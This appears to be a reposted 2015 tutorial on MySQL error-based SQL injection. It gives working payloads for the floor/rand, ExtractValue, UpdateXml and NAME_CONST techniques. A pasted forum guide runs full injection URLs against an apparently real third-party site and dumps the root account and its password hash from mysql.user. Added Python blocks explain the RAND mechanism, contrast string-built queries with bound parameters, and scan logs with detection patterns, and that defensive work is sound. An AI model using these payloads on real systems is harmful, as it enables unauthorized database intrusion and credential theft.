MySQL error-based injection: three error modes using floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37

1. Errors via floor

Some payloads that can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The error message has revealed the MySQL version. To read other data, replace the version() expression with another subquery.
For example, to fetch the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
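As an added example that is not part of the original post, the following Python reproduces MySQL's RAND(seed) generator and models the two evaluations of the GROUP BY key, which is why the third row produces the duplicate 'group_key' entry shown above. The seeding formula and MAX_VALUE follow MySQL's my_rnd() routine; simulate_group_by is a simplified model of the temporary-table step, not MySQL code.

```python
MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


def mysql_rand(seed: int):
    """Generator reproducing MySQL RAND(seed): same seeding and recurrence
    as the server's my_rnd(), so RAND(0) yields 0.155, 0.620, 0.638, 0.331, ..."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_sequence(n: int, seed: int = 0):
    """First n values of floor(rand(seed)*2); for seed 0 this is 0,1,1,0,1,..."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]


def simulate_group_by(prefix: str, row_count: int, seed: int = 0):
    """Simplified model (not MySQL code) of
    GROUP BY concat(prefix, floor(rand(seed)*2)) over row_count rows.

    The grouping key is computed once to look the group up in the temporary
    table and computed again when a new group has to be inserted, so the
    RAND() sequence advances twice for every new group.  Returns
    (error_message, groups); error_message is None when no key collides.
    """
    gen = mysql_rand(seed)
    groups = {}
    for _ in range(row_count):
        key = f"{prefix}{int(next(gen) * 2)}"  # lookup: is this group present?
        if key in groups:
            groups[key] += 1
            continue
        key = f"{prefix}{int(next(gen) * 2)}"  # insert: key is evaluated again
        if key in groups:                      # already there -> ERROR 1062
            return f"Duplicate entry '{key}' for key 'group_key'", groups
        groups[key] = 1
    return None, groups
```

With seed 0 the sequence is 0,1,1,0,1: row 1 probes key 0 and inserts key 1, row 2 finds key 1, row 3 probes key 0 and then tries to insert key 1 again, which is the collision. A table with only two rows never reaches the collision, which is why the payloads group over information_schema.tables.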

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
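Added example, not from the original post: the article lookup used throughout this post, built once by string concatenation and once with a bound parameter, run against an in-memory sqlite3 table constructed for the demo. sqlite does not know updatexml(), so the vulnerable path fails with a different error than MySQL would give, but it still shows that the payload reaches the SQL parser and that the parser's error text is what comes back to the client, while the bound parameter is never parsed as SQL.

```python
import sqlite3

# The post's UpdateXml payload as it would arrive in the id parameter (constructed).
PAYLOAD = "1 and 1=(updatexml(1,concat(0x3a,(select user())),1))"


def open_db():
    """In-memory stand-in for the post's article table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table article (id integer primary key, title text, content text)")
    con.execute("insert into article values (1, 'test', 'do it')")
    return con


def lookup_vulnerable(con, raw_id: str):
    """String-built query: whatever is in raw_id is parsed as SQL."""
    return con.execute(f"select * from article where id = {raw_id}").fetchall()


def lookup_hardened(con, raw_id: str):
    """Type-check first, then bind: the value cannot change the statement."""
    article_id = int(raw_id)  # raises ValueError for anything but a plain integer
    return con.execute("select * from article where id = ?", (article_id,)).fetchall()


def compare(raw_id: str):
    """Run both lookups and report what each hands back to the caller:
    a row list, or the text that would have gone back to the client."""
    con = open_db()
    result = {}
    try:
        result["vulnerable"] = lookup_vulnerable(con, raw_id)
    except sqlite3.Error as err:
        result["vulnerable"] = f"db error leaked: {err}"  # this text is the channel
    try:
        result["hardened"] = lookup_hardened(con, raw_id)
    except ValueError as err:
        result["hardened"] = f"rejected: {err}"
    return result
```

The practical mitigation is both halves of lookup_hardened: parameter binding removes the injection, and a generic error page (never the raw database message) removes the channel even where some legacy query is still concatenated.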


More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the name_const method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error: Duplicate column name '5.0.27-community-nt'


Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error: Duplicate column name '1'

Now let's get the tables out this bitch...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'


Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'



And there we have it, thanks for reading.
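Added example, not part of the original post, covering all four error modes on this page (floor/GROUP BY, ExtractValue, UpdateXml and NAME_CONST): a scanner that flags the error strings these techniques depend on, plus the MySQL function names in URL-decoded request paths, run over constructed sample log lines. The log layout (date, time, client, method, path, status, optional quoted error text) is an assumption; the IP addresses are documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Response/DB-log side: the three MySQL error families this post relies on.
ERROR_SIGNATURES = {
    "floor_groupby": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath_function": re.compile(r"XPATH syntax error: '"),
    "name_const": re.compile(r"Duplicate column name '"),
}

# Request side: the functions the payloads call, matched after URL decoding.
REQUEST_SIGNATURE = re.compile(
    r"\b(extractvalue|updatexml|name_const)\s*\(|floor\s*\(\s*rand\s*\(\s*0\s*\)",
    re.IGNORECASE,
)

# Constructed sample log (assumed layout: date time client method path status "error").
SAMPLE_LOG = """\
2015-11-11 19:03:01 203.0.113.7 GET /content/detail.php?id=330 200
2015-11-11 19:03:05 203.0.113.7 GET /content/detail.php?id=330+and+extractvalue(1,concat(0x5c,version())) 500 "XPATH syntax error: '\\5.1.33'"
2015-11-11 19:03:09 203.0.113.7 GET /content/detail.php?id=330%20and%201=(updatexml(1,concat(0x3a,user()),1)) 500
2015-11-11 19:03:12 198.51.100.2 GET /content/detail.php?id=331 200
2015-11-11 19:03:15 203.0.113.7 GET /content/detail.php?id=330 500 "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"
2015-11-11 19:03:20 203.0.113.7 GET /content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- 500 "Duplicate column name '5.1.33'"
"""


def scan_line(line: str):
    """Return the names of every signature that fires on one log line."""
    hits = []
    if REQUEST_SIGNATURE.search(unquote_plus(line)):  # decode %20 and + first
        hits.append("request_payload")
    for name, pattern in ERROR_SIGNATURES.items():
        if pattern.search(line):
            hits.append(name)
    return hits


def scan_log(text: str):
    """Map 1-based line numbers to the signatures that fired; clean lines are omitted."""
    findings = {}
    for number, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings[number] = hits
    return findings
```

An error signature firing without a request signature (line 5 above) is the more interesting case: the payload arrived through a body or header that is not in the access log, and only the database error text gives it away, which is also why those messages should never reach the client in the first place.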
